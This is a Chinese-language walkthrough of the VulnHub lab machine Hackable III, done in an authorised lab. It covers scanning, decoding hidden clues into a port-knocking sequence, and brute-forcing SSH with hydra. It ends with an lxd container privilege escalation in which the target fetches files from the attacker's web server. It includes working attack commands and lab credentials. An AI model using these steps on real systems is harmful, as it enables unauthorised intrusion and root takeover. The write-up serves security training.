vulhub系列-74-Hackable III(超详细)-洪萨配资

免责声明：本文记录的是 Hackable III 渗透测试靶机的解题过程，所有操作均在本地授权环境中进行。内容仅供网络安全学习与防护研究使用，请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规，自觉维护网络空间安全。

环境： https://download.vulnhub.com/hackable/hackable3.ova

一、信息收集

1、探测目标IP地址

arp-scan -l #探测当前网段的所有ip地址

┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:2f:d8:88 PCS Systemtechnik GmbH 192.168.5.12 08:00:27:79:d5:0f PCS Systemtechnik GmbH  5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.968 seconds (130.08 hosts/sec). 3 responded

nmap -sP 192.168.5.0/24

┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 02:53 -0400 Nmap scan report for 192.168.5.1 Host is up (0.00014s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00015s latency). MAC Address: 08:00:27:2F:D8:88 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.12 Host is up (0.00016s latency). MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.5 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 4.41 seconds

目标IP：192.168.5.12

2、探测目标IP开放端口

nmap -sV -p- 192.168.5.12

┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.12 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 02:54 -0400 Nmap scan report for 192.168.5.12 Host is up (0.000095s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.4.46 ((Ubuntu)) MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC)  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds

端口：22、80

3、目录探测

dirsearch -u http://192.168.5.12

┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.12 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.5.12/_26-03-23_04-21-48.txt Target: http://192.168.5.12/ [04:21:48] Starting: [04:21:48] 301 - 309B - /js -> http://192.168.5.12/js/ [04:21:49] 403 - 277B - /.ht_wsr.txt [04:21:49] 403 - 277B - /.htaccess.bak1 [04:21:49] 403 - 277B - /.htaccess.orig [04:21:49] 403 - 277B - /.htaccess.sample [04:21:49] 403 - 277B - /.htaccess.save [04:21:49] 403 - 277B - /.htaccess_extra [04:21:49] 403 - 277B - /.htaccess_sc [04:21:49] 403 - 277B - /.htaccessOLD [04:21:49] 403 - 277B - /.htaccess_orig [04:21:49] 403 - 277B - /.htaccessOLD2 [04:21:49] 403 - 277B - /.htaccessBAK [04:21:49] 403 - 277B - /.htm [04:21:49] 403 - 277B - /.html [04:21:49] 403 - 277B - /.htpasswd_test [04:21:49] 403 - 277B - /.htpasswds [04:21:49] 403 - 277B - /.httr-oauth [04:21:57] 301 - 313B - /backup -> http://192.168.5.12/backup/ [04:21:57] 200 - 458B - /backup/ [04:21:59] 301 - 313B - /config -> http://192.168.5.12/config/ [04:21:59] 200 - 507B - /config.php [04:21:59] 200 - 450B - /config/ [04:22:00] 301 - 310B - /css -> http://192.168.5.12/css/ [04:22:04] 200 - 3KB - /home.html [04:22:05] 200 - 454B - /js/ [04:22:07] 200 - 487B - /login.php [04:22:14] 200 - 33B - /robots.txt [04:22:14] 403 - 277B - /server-status [04:22:14] 403 - 277B - /server-status/ Task Completed

二、漏洞利用

1、信息搜集

http://192.168.5.12/

先F12查看一下源代码，发现了一个邮箱和一个用户jubiscleudo还有/robots.txt/进行访问

<!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com" -->

/backup/下有个wordlist.txt字典wget命令进行下载

wget http://192.168.5.12/backup/wordlist.txt

/config/进行base64编码解密得到：10000

http://192.168.5.12/config/

/css/下面也有东西Brainfuck解码得到4444

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....

在login.php得源代码中发现了3.jpg进行访问，steghide进行解密得到：65535

http://192.168.5.12/login.php

http://192.168.5.12/3.jpg

# 下载照片： wget http://192.168.5.12/3.jpg # 提取数据 steghide extract -sf 3.jpg # 查看文件 cat steganopayload148505.txt

┌──(root㉿kali)-[~] └─# wget http://192.168.5.12/3.jpg --2026-03-23 04:31:49-- http://192.168.5.12/3.jpg 正在连接 192.168.5.12:80... 已连接。 已发出 HTTP 请求，正在等待回应... 200 OK 长度：61259 (60K) [image/jpeg] 正在保存至: “3.jpg” 3.jpg 100%[============================>] 59.82K --.-KB/s 用时 0s 2026-03-23 04:31:49 (462 MB/s) - 已保存 “3.jpg” [61259/61259]) ┌──(root㉿kali)-[~] └─# steghide extract -sf 3.jpg Enter passphrase: wrote extracted data to "steganopayload148505.txt". ┌──(root㉿kali)-[~] └─# cat steganopayload148505.txt porta:65535

推测端口敲门，端口顺序10000，4444，65535而且还给了22端口

2、端口敲门

knock 192.168.5.12 10000 4444 65535 nmap -sV -p- 192.168.5.12

┌──(root㉿kali)-[~] └─# knock 192.168.5.12 10000 4444 65535 ┌──(root㉿kali)-[~] └─# ┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.12 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 04:39 -0400 Nmap scan report for 192.168.5.12 Host is up (0.00010s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.46 ((Ubuntu)) MAC Address: 08:00:27:79:D5:0F (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds

3、SSH暴力破解

这里我们的思路就是：刚刚得到个字典进行ssh爆破密码使用工具：hydra得到密码：onlymy尝试登入登入成功！！

hydra -l jubiscleudo -P wordlist.txt 192.168.5.12 ssh

┌──(root㉿kali)-[~] └─# hydra -l jubiscleudo -P wordlist.txt 192.168.5.12 ssh Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-23 04:41:28 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 300 login tries (l:1/p:300), ~19 tries per task [DATA] attacking ssh://192.168.5.12:22/ [22][ssh] host: 192.168.5.12 login: jubiscleudo password: onlymy 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 3 final worker threads did not complete until end. [ERROR] 3 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-23 04:42:27 ┌──(root㉿kali)-[~] └─#

4、ssh登录

ssh jubiscleudo@192.168.5.12 密码：onlymy

┌──(root㉿kali)-[~] └─# ssh jubiscleudo@192.168.5.12 The authenticity of host '192.168.5.12 (192.168.5.12)' can't be established. ED25519 key fingerprint is: SHA256:eKPnFiq8KwR3xWNP5ZL/aPJYYx+GZaCVrzrHIL4rem4 This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.5.12' (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html jubiscleudo@192.168.5.12's password: Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Mar 23 01:45:15 PM UTC 2026 System load: 0.0 Memory usage: 45% Processes: 112 Usage of /: 19.7% of 23.99GB Swap usage: 0% Users logged in: 0 => There were exceptions while processing one or more plugins. See /var/log/landscape/sysinfo.log for more information. 0 updates can be installed immediately. 0 of these updates are security updates. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings Last login: Thu Apr 29 16:19:07 2021 from 192.168.2.106 jubiscleudo@ubuntu20:~$

5、信息搜集

发现了一个新用户：hackable_3和密码TrOLLED_3

jubiscleudo@ubuntu20:~$ cd /var/www/html/ jubiscleudo@ubuntu20:/var/www/html$ ls 3.jpg config css imagens js login.php backup config.php home.html index.html login_page robots.txt jubiscleudo@ubuntu20:/var/www/html$ jubiscleudo@ubuntu20:/var/www/html$ jubiscleudo@ubuntu20:/var/www/html$ jubiscleudo@ubuntu20:/var/www/html$ cat config.php <?php /* Database credentials. Assuming you are running MySQL server with default setting (user 'root' with no password) */ define('DB_SERVER', 'localhost'); define('DB_USERNAME', 'root'); define('DB_PASSWORD', ''); define('DB_NAME', 'hackable'); /* Attempt to connect to MySQL database */ $conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME); // Check connection if($conexao === false){ die("ERROR: Could not connect. " . mysqli_connect_error()); } else { } ?> jubiscleudo@ubuntu20:/var/www/html$ jubiscleudo@ubuntu20:/var/www/html$ jubiscleudo@ubuntu20:/var/www/html$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin sshd:x:112:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin hackable_3:x:1000:1000:hackable_3:/home/hackable_3:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false jubiscleudo:x:1001:1001:,,,:/home/jubiscleudo:/bin/bash jubiscleudo@ubuntu20:/var/www/html$

5、切换用户

su hackable_3 密码：TrOLLED_3

jubiscleudo@ubuntu20:/var/www/html$ su hackable_3 Password: hackable_3@ubuntu20:/var/www/html$ cd hackable_3@ubuntu20:~$

6、lxd提权

lxd提权原理是下载一个镜像，使用镜像创建容器，将容器目录直接映射到物理主机目录，即可在容器中直接访问物理主机的文件查看当前系统中的镜像：lxc image list

kali：

git clone https://github.com/saghul/lxd-alpine-builder/ ls python -m http.server 8000

目标靶机：

cd /tmp wget http://192.168.5.5:8000/lxd-alpine-builder/alpine-v3.13-x86_64-20210218_0139.tar.gz wget http://192.168.5.5:8000/lxd-alpine-builder/build-alpine ls sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine sudo ./build-alpine -a i686 lxc image import ./alpine*.tar.gz --alias myimage lxd init lxc init myimage mycontainer -c security.privileged=true lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true lxc start mycontainer lxc exec mycontainer /bin/sh

本文涉及的技术方法仅适用于授权测试环境或合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路，始于合规，终于责任。